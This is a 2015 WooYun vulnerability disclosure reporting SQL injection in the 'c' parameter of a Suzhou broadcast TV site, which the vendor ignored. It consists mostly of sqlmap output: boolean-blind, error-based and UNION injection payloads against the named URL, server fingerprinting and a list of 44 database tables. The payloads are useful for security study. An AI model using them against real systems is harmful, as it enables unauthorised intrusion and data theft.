当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0159958

漏洞标题:苏州广电网某系统存在SQL注入漏洞

相关厂商:csztv.cn

漏洞作者: 深度安全实验室

提交时间:2015-12-10 15:09

修复时间:2015-12-15 15:10

公开时间:2015-12-15 15:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-10: 细节已通知厂商并且等待厂商处理中
2015-12-15: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

http://e.csztv.cn/menu.php?c=1

111.png

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: c (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: c=1' AND 3864=3864 AND 'SBEJ'='SBEJ
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: c=1' AND (SELECT 7523 FROM(SELECT COUNT(*),CONCAT(0x7170766b71,(SELECT (ELT(7523=7523,1))),0x7176717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'LIwG'='LIwG
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: c=-1356' UNION ALL SELECT CONCAT(0x7170766b71,0x53646b665a6256454456,0x7176717171)--
---
web server operating system: Linux Ubuntu 13.04 or 12.04 or 12.10 (Raring Ringtail or Precise Pangolin or Quantal Quetzal)
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: MySQL 5.0
Database: weberp
[44 tables]
+----------------------+
| twms_backup |
| twms_guest |
| twms_instore_main |
| twms_instore_sub |
| twms_log |
| twms_notice |
| twms_outstore_main |
| twms_outstore_sub |
| twms_prod_cate |
| twms_product |
| twms_store |
| twms_user |
| viooma_accounts |
| viooma_area |
| viooma_bank |
| viooma_basic |
| viooma_boss |
| viooma_categories |
| viooma_config |
| viooma_dw |
| viooma_flink |
| viooma_group |
| viooma_guest |
| viooma_gys |
| viooma_kc |
| viooma_kcbackgys |
| viooma_lab |
| viooma_mainkc |
| viooma_menu |
| viooma_none |
| viooma_part |
| viooma_pay |
| viooma_recordline |
| viooma_reportbackgys |
| viooma_reportnone |
| viooma_reportrk |
| viooma_reportsale |
| viooma_reportsback |
| viooma_reportswitch |
| viooma_sale |
| viooma_saleback |
| viooma_staff |
| viooma_switch |
| viooma_usertype |
+----------------------+

漏洞证明:

修复方案:

版权声明:转载请注明来源 深度安全实验室@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-12-15 15:10

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无